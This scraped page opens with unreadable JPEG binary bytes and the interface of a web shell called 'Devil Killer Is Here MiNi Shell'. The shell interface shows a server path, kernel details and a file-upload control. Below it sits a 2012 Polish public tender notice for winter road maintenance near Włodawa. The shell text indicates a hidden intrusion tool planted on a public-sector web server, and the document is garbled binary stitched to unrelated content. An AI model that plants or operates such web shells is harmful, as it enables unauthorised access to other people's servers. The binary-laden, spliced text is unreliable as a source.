JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120814/175369-N-2012.html

<p class="kh_header"><b>Włodawa: Zimowe utrzymanie dróg w sezonie 2012/2013 tj. zwalczanie śliskości i odśnieżanie
        dróg wojewódzkich administrowanych przez Rejon Dróg Wojewódzkich 
        we Włodawie:	
1)   droga nr 812 (Biała Podlaska - Wisznice - Włodawa - Chełm - Krasnystaw)
     odcinek Wisznice - Łowcza,
2)   droga nr 816 (Terespol - Kodeń - Włodawa - Dorohusk) 
     odcinek Kodeń - Dorohusk,
3)   droga nr 818 (Przewłoka - Wyryki Adampol) 
     odcinek Krzywowierzba - Wyryki Adampol,
4)  droga nr 819 (Parczew - Sosnowica - Wola Uhruska) 
     odcinek Sosnowica - Wola Uhruska.</b><br>
<b>Numer ogłoszenia: 175369 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg w sezonie 2012/2013 tj. zwalczanie śliskości i odśnieżanie
        dróg wojewódzkich administrowanych przez Rejon Dróg Wojewódzkich 
        we Włodawie:	
1)   droga nr 812 (Biała Podlaska - Wisznice - Włodawa - Chełm - Krasnystaw)
     odcinek Wisznice - Łowcza,
2)   droga nr 816 (Terespol - Kodeń - Włodawa - Dorohusk) 
     odcinek Kodeń - Dorohusk,
3)   droga nr 818 (Przewłoka - Wyryki Adampol) 
     odcinek Krzywowierzba - Wyryki Adampol,
4)  droga nr 819 (Parczew - Sosnowica - Wola Uhruska) 
     odcinek Sosnowica - Wola Uhruska..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres zamówienia:
   
     1) Zadanie Nr I.

         - solarka - szt. 6 (nośnik i solarka własność Wykonawcy, pług lemieszowy 
           jednostronny użyczony z RDW)
      Maksymalna ilość usług:
a)	zwalczanie śliskości , zwalczanie śliskości + odśnieżanie   - 380 godz./szt.
b)	odśnieżanie			                                               - 130 godz./szt.
c)	dyżur                                                                                     -   25 godz./szt.

2) Zadanie Nr II.

- piaskarka - szt. 2 (nośnik własność Wykonawcy, piaskarka i pług lemieszowy
  użyczone  z RDW)
Maksymalna ilość usług:
a)  zwalczanie śliskości, zwalczanie śliskości + odśnieżanie  - 300 godz./szt.
b)  odśnieżanie                                                                         - 100 godz./szt.
c)  dyżur                                                                                   -   25 godz./szt.

3) Zadanie Nr III.

- pług odśnieżny średni - szt. 2 (nośnik własność Wykonawcy, pług lemieszowy użyczony z RDW).
Maksymalna ilość usług:
a)	odśnieżanie - 120 godz./szt.

4) Zadanie Nr IV 

- pług odśnieżny ciężki - szt. 1 (nośnik i pług własność Wykonawcy)
Maksymalna ilość usług:
a)	odśnieżanie - 100 godz. 

5) Zadanie Nr V.

- równiarka - szt. 2 (równiarka własność Wykonawcy)
Maksymalna ilość usług:
a)	odśnieżanie - 100 godz./szt.
2. Zakres usług obejmuje:
       a)  przygotowanie nośnika -montaż na nośniku solarki/piaskarki, pługa
             odśnieżnego, lamp ostrzegawczych,
       b)  załadunek materiałów do zwalczania śliskości zimowej (sól, mieszanka piaskowo-
            solna) oraz sporządzenie solanki,
       c)  zwalczanie śliskości zimowej i odśnieżanie nawierzchni dróg według
            standardów ustalonych przez Zamawiającego,
       d)  dyżur sprzętu (przez dyżur sprzętu należy rozumieć podstawienie pojazdu
            samochodowego z osprzętem i obsługą na bazę RDW po wcześniejszym wezwaniu
            (dotyczy solarek i piaskarek),
       e)  utrzymanie w gotowości sprzętu i maszyn przewidzianych do realizacji  
            niniejszej umowy wraz z ich obsługą,
       f)  zapewnienie przez Wykonawcę we własnym zakresie i na swój koszt paliwa ,obsługi
            naprawczo- remontowej sprzętu uczestniczącego w świadczeniu usług zarówno własnego
            jak i sprzętu będącego własnością Zamawiającego, współpracującego przy realizacji umowy
            ze sprzętem Wykonawcy,
      g)  wykonanie na własny koszt konserwacji  (oczyszczenie z rdzy i malowanie) sprzętu będącego
            własnością  Zamawiającego, współpracującego  przy realizacji umowy ze sprzętem Wykonawcy 
            i zwrot do RDW we   Włodawie w terminie do dnia 30.05.2013 r.
3.  Usługi realizowane będą zgodnie ze Specyfikacją techniczną warunków usług 
     związanych z pracą pługów, piaskarek i sprzętu do zimowego utrzymania dróg
4. Oprócz czynności wymienionych w ust 1 pkt. a, b, c, d, e, f do obowiązków Wykonawcy
     należy niezwłoczne przekazywanie za pośrednictwem osób obsługujących
     pojazdy i sprzęt osobom upoważnionym przez Zamawiającego informacji o:
a)	czasie rozpoczęcia i zakończenia pracy na poszczególnych odcinkach dróg,
b)	aktualnym stanie przejezdności dróg,
c)	zagrożeniach spowodowanych warunkami atmosferycznymi,
d)	innych zdarzeniach na drodze zagrażających bezpieczeństwu ruchu.
5.  Zamawiający zabezpieczy i udostępni Wykonawcy materiały do zwalczania śliskości. 
     Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego  koszt.
     Zamawiający posiada plac składowy w miejscowości Dobropol. Przy sporządzaniu oferty należy
     brać pod uwagę lokalizację w/w placu. W wycenie oferty Wykonawca może uwzględnić własne
     place składowe. Place składowe będące w dyspozycji Wykonawcy powinny być utwardzone 
     i spełniać wymagania ochrony środowiska i bhp. Za użyczenie placów składowych przez
    Wykonawcę Zamawiający nie będzie ponosił dodatkowych kosztów
6.  Wykonawca zobowiązany jest do wyrażenia zgody na montaż na nośniku solarki i piaskarki 
     urządzenia do lokalizacji satelitarnej pojazdów (GPS), oraz dbanie o jego stan techniczny.
7.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne
     opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne 
     opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi
     spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy 
     Prawo zamówień publicznych).Za rozwiązania równoważne uznana będzie oferta na
     wykonanie usług z wykorzystaniem sprzętu innego niż określony w ST, pod warunkiem,
     że jego parametry nie będą gorsze niż określone w ST.
8. Szacunkowa wartość zamówienia netto: 803 320,00 PLN
w tym: Zadanie Nr 1 - 585 120,00 PLN, Zadanie Nr 2 - 131 200,00 PLN, 
Zadanie Nr 3 - 36 000,00 PLN, Zadanie Nr 4 - 17 000,00 PLN, 
Zadanie Nr 5 - 34 000,00 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.63.00.00-2, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w  wysokości :
     a) zadanie nr I                             -  1000,00 zł   za każdą zaoferowaną jednostkę,
     b) zadanie nr II                            -    500,00 zł  za każdą zaoferowaną jednostkę,
     c) zadanie nr III                           -    300,00 zł  za każdą zaoferowaną jednostkę,
     d) zadanie nr IV                          -     200,00 zł. za każdą zaoferowaną jednostkę
     e) zadanie nr V                            -     200,00 zł  za każdą zaoferowaną jednostkę,.
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo 
    zamówień publicznych.
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy 
    w  Kredyt Banku S.A. O/Lublin Nr 89 1500 1520- 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1) Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo
     zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez
     Zamawiającego. W myśl art. 63 ust. 3 pkt 1 ustawy Prawo bankowe z dnia 29 sierpnia
    1997 r. ( Dz.U z 2002 r. nr 72 poz. 665 j. t.) polecenie przelewu jest jedną z form rozliczenia
     bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną
     bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą 
     rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub 
     w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2) Wadium wnoszone przelewem (art.45 ust. 7 ustawy Pzp) uważa się za wniesione w terminie
     jeżeli wpłynie na konto Zamawiającego przed upływem terminu składania ofert.
5. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:
    1) Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w
        sprawie zamówienia publicznego na warunkach określonych w ofercie,
    2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
       przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
          spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnia/ni spełnia na podstawie złożonego oświadczeniaw formie pisemnej , że Wykonawca spełnia warunki, o których mowa w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
          spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia warunku będzie dokonywana w następujący sposób: spełnia/nie spełnia na podstawie złożonego oświadczenia w formie pisemnej , że Wykonawca spełnia warunki, o których mowa w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku dysponowania potencjałem technicznym Wykonawca winien
         dysponować n/w jednostkami transportowymi i sprzętowymi w ilości minimum zaoferowanej: 
         1) nośnik solarki (pojazd samochodowy o ład. min 8 t z zamontowaną solarką należącą do
           Wykonawcy),
         2) nośnik piaskarki (pojazd samochodowy o ładowności min. 8 t)
         3) nośnik pługa średniego (pojazd samochodowy o ładowności min. 8 t)
         4) nośnik pługa ciężkiego (pojazd samochodowy z napędem na dwie osie o ładowności min. 12 t)
         5) sprzęt do załadunku mieszanki lub soli,
         6) wytwornica solanki,
         7) równiarka.
 Ocena spełniania warunku będzie dokonywana w następujący sposób: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie dysponowania osobami  zdolnymi do wykonania zamówienia
         Wykonawcę winien dysponować:
         - osobą/osobami  posiadającą odpowiednie uprawnienia do kierowania pojazdami w 
            przypadku nośników  solarek, piaskarek i pługów,
         - osobą posiadającą uprawnienia maszynisty (równiarki)
         w ilości odpowiadającej zaoferowanej .
Ocena spełniania warunku będzie dokonywana w następujący sposób: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku będzie dokonywana w następujący sposób: spełnia/nie spełnia na podstawie złożonego oświadczenia w formie pisemnej , że Wykonawca spełnia warunki, o których mowa w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca obowiązany jest dołączyć do oferty:
     1) dowód wniesienia wadium.
     2) ofertę przetargową (z ceną brutto, netto i z podatkiem VAT)  wraz
          z kosztorysem ofertowym 
     3) podpisany wzór umowy 
     4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do
         oferty  należy   załączyć   dokument  (np. odpowiednią umowę) ustanawiający 
         pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
         albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia 
         publicznego zgodnie z art. 23 ust. 1 i 2  ustawy  Prawo zamówień publicznych.
    5) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie
         są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do
         ewidencji działalności gospodarczej, do oferty należy załączyć dokument 
         potwierdzający prawo do reprezentowania podmiotu przez osobę/osby  podpisujące ofertę
    6) W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający
         pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie 
         zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 
         zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany postanowień zawartej umowy wymagają dla swej ważności formy
     Pisemnej.
2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do 
    treści oferty, polegających na zmianie wynagrodzenia , w przypadku zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 
    22-200 Włodawa, ul. Lubelska 60, pokój nr 2 w godz. 07:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2012 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 
    22-200 Włodawa, ul Lubelska 60  pokój nr 15 /sekretariat/ Otwarcie ofert w dniu 23.08.2012 r. godz.09:10, pokój Nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. W niniejszym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz
     informacje przekazywane będą faksem lub drogą elektroniczną na adres e-mail 
     rdw.wlodawa@zdw.lublin.pl
     2.  Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia
     lub inne informacje za pomocą faksu lub drogą elektroniczną, każda ze stron na żądanie drugiej
     niezwłocznie potwierdza fakt ich otrzymania.
3. Wyjaśnienia dotyczące SIWZ udzielane będą z zachowaniem zasad określonych w art. 38
     ustawy. Wyjaśnienia zostaną  zamieszczone na stronie internetowej  Zamawiającego
     http://www.ebip.lublin.pl/zdw/
4. Wszelką korespondencję należy przekazywać na niżej podany adres Zamawiającego:
     Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie
                                 22-200 Włodawa, ul. Lubelska 60
     z dopiskiem: postępowanie przetargowe na Zimowe utrzymanie dróg w sezonie 
    2012/2013, tj. zwalczanie śliskości i odśnieżanie dróg wojewódzkich administrowanych
    przez RDW we Włodawie5. Osobami uprawnionymi do porozumiewania się z Wykonawcami w imieniu
    Zamawiającego są:
    1) w sprawach technicznych:  Krystyna Kowalewska, pok. Nr 4 w godz. 7 - 15 
